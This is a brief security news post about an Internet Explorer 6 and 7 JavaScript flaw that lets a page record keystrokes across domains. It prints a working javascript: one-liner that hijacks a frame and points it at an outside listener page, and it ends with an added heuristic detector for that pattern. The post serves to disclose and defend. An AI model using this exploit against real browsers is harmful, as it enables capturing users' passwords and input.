Internet Explorer 6 & 7 critical JavaScript exploit

Ghacks has found a critical JavaScript vulnerability affecting Internet Explorer 6 and 7 that can be used to record a user's keystrokes even when he switches domains. That means a specially prepared website can launch some JavaScript that records everything the user does afterwards, including text input, which naturally means usernames and passwords as well.

The following JavaScript code, when clicked, opens a new window (hackademix.net), hijacks one of its iframes, and captures keystrokes.

javascript:x=open('http://hackademix.net/');setInterval(function(){try{x.frames[0].location={toString:function(){return%20'http://www.sirdarckcat.net/caballero-listener.html';}}}catch(e){}},5000);void(1);

There is no fix for this vulnerability at the moment. If you're using IE 6 or IE 7, all you can do is disable JavaScript or allow it only on trusted domains. An explanation from the same researcher is available.
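For reviewing links, bookmarklets or proxy logs for the pattern in the snippet above (a frame's location assigned an object whose toString returns a URL), here is a heuristic static check. It is an added example, not code from the original post or the researcher; the rule names, function names and sample hostnames are constructed for illustration.

```javascript
// Added example: heuristic detector for the frame-location pattern described above.
// Rule ids and both sample strings are constructed; hostnames are placeholders.
const RULES = [
  { id: 'opens-window', re: /\b(?:window\.)?open\s*\(/ },
  { id: 'frame-location-write', re: /\.frames\s*\[[^\]]*\]\s*\.location\s*=(?!=)/ },
  { id: 'tostring-object-as-location', re: /\.location\s*=\s*\{[^}]*\btoString\s*:/ },
  { id: 'repeating-timer', re: /\bset(?:Interval|Timeout)\s*\(/ },
];

// javascript: URLs are often percent-encoded (the page's sample contains %20),
// so decode before matching and drop the scheme prefix.
function normalize(input) {
  let s = input.trim();
  try {
    s = decodeURIComponent(s);
  } catch (e) {
    // Malformed escape sequence: fall back to matching the raw text.
  }
  return s.replace(/^javascript:/i, '');
}

// Returns every rule that matched, plus a verdict. A plain string written to a
// frame's location is ordinary navigation; the object-with-toString form is
// what distinguishes the technique on this page.
function inspect(input) {
  const code = normalize(input);
  const hits = RULES.filter((r) => r.re.test(code)).map((r) => r.id);
  const suspicious =
    hits.includes('frame-location-write') &&
    hits.includes('tostring-object-as-location');
  return { hits, suspicious };
}

// Constructed sample with the same shape as the page's snippet.
const SAMPLE_FLAGGED =
  "javascript:x=open('http://site.example/');setInterval(function(){try{" +
  "x.frames[0].location={toString:function(){return%20'http://listener.example/l.html';}}" +
  "}catch(e){}},5000);void(1);";

// Constructed benign sample: ordinary string navigation of a child frame.
const SAMPLE_BENIGN =
  "x=open('http://site.example/');x.frames[0].location='http://site.example/help';";

console.log(inspect(SAMPLE_FLAGGED));
console.log(inspect(SAMPLE_BENIGN));
```

A match is a reason to look closer, not proof: the check is purely textual and does not evaluate the script.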

Source: Ghacks